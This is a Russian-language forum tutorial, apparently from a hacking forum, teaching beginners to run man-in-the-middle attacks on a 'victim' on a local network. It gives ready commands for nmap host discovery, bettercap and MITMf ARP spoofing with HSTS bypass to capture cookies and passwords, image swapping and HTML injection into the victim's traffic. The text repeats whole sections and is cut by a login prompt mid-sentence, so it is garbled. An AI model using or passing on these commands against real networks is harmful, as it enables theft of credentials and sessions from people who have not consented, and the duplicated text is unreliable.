Здравствуйте юзеры,
Сегодня научу вас элементарным взломам при помощи утилит Bettercap и MITMf.
Попрошу кулхацкеров не писать "давно уже знал это" или "баян", Статья написана для новичков!
Ну что, погнали?
Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственность за любой возможный вред причиненный вами!
Если постараться, то можно реализовать все это на обычном смартфоне на базе андроид, но об этом в следующий раз.
Сегодня научу вас элементарным взломам при помощи утилит Bettercap и MITMf.
Попрошу кулхацкеров не писать "давно уже знал это" или "баян", Статья написана для новичков!
Ну что, погнали?
Вся информация предоставлена исключительно в ознакомительных целях. Автор не несет ответственность за любой возможный вред причиненный вами!
Bettercap
Bettercap - набор инструментов для проведения тестов на безопасность в сети.
И так, приступим, для этого нам понадобится Kali Linux и утилита под названием Bettercap.
Для начала нам нужно узнать IP роутера, для этого откроем терминал и запишем вот эту команду...
route -n
Получив адрес роутера нам нужно узнать адрес жертвы...
nmap -sP 192.168.1.1/24
Дальше, вводим собственно и саму команду для перехвата печенька и паролей...
bettercap --interface eth0 --gateway 192.168.1.1 --target IP ЖЕРТВЫ -X
Поздравляю, перехват куки и паролей начался.
MITMf
Второй способ перехватить куки, это при помощи утилиты MITMf.
MITMf — это фреймворк для атак человек-посередине (Man-In-The-Middle attacks). Этот инструмент основывается на
Цель MITMf — быть инструментом всё-в-одном для сетевых атак и атак человек-по-середине, при этом обновляя и усовершенствую существующие атаки и техники.
Давайте установим MITMf...
sudo apt-get install mitmf mitmflib
Для перехвата куки вводим команду...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА -- target IP ЖЕРТВЫ --ferretng
Перехват начался)
Bettercap - набор инструментов для проведения тестов на безопасность в сети.
И так, приступим, для этого нам понадобится Kali Linux и утилита под названием Bettercap.
Для начала нам нужно узнать IP роутера, для этого откроем терминал и запишем вот эту команду...
route -n
Получив адрес роутера нам нужно узнать адрес жертвы...
nmap -sP 192.168.1.1/24
Дальше, вводим собственно и саму команду для перехвата печенька и паролей...
bettercap --interface eth0 --gateway 192.168.1.1 --target IP ЖЕРТВЫ -X
Поздравляю, перехват куки и паролей начался.
MITMf
Второй способ перехватить куки, это при помощи утилиты MITMf.
MITMf — это фреймворк для атак человек-посередине (Man-In-The-Middle attacks). Этот инструмент основывается на
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
и является попыткой возродить и обновить этот проект.Цель MITMf — быть инструментом всё-в-одном для сетевых атак и атак человек-по-середине, при этом обновляя и усовершенствую существующие атаки и техники.
Давайте установим MITMf...
sudo apt-get install mitmf mitmflib
Для перехвата куки вводим команду...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА -- target IP ЖЕРТВЫ --ferretng
Перехват начался)
Как перевернуть изображение на 180 градусов?
Что бы перевернуть картинку на 180 градусов, мы будем использовать все тот же MITMf.
Как узнать IP роутера и жертвы вы уже знаете, так что приступим сразу к команде.
Вводим...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --upsidedownternet
Как заменить изображение?
Вводим..
mitmf -i eth0 --spoof --arp --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --imgrand --img-dir ПУТЬ К ПАПКЕ С КАРТИНКОЙ
Что бы перевернуть картинку на 180 градусов, мы будем использовать все тот же MITMf.
Как узнать IP роутера и жертвы вы уже знаете, так что приступим сразу к команде.
Вводим...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --upsidedownternet
Как заменить изображение?
Вводим..
mitmf -i eth0 --spoof --arp --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --imgrand --img-dir ПУТЬ К ПАПКЕ С КАРТИНКОЙ
Инжект в HTML
Для начала нам нужно создать html файл с кодом.
Давайте для примера создадим черную страницу с красным текстом.
Сохраним этот файл, и в консоли пишем команду для инжекту...
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --inject --html-file 'ПУТЬ К ФАЙЛУ /index.html'
Для начала нам нужно создать html файл с кодом.
Давайте для примера создадим черную страницу с красным текстом.
Код:
<html>
<body bgcolor="red">
<p><font size="15" color="red">BHF.io</font></p>
</body>
</html>
mitmf -i eth0 --spoof --arp --hsts --gateway IP РОУТЕРА --target IP ЖЕРТВЫ --inject --html-file 'ПУТЬ К ФАЙЛУ /index.html'
Если постараться, то можно реализовать все это на обычном смартфоне на базе андроид, но об этом в следующий раз.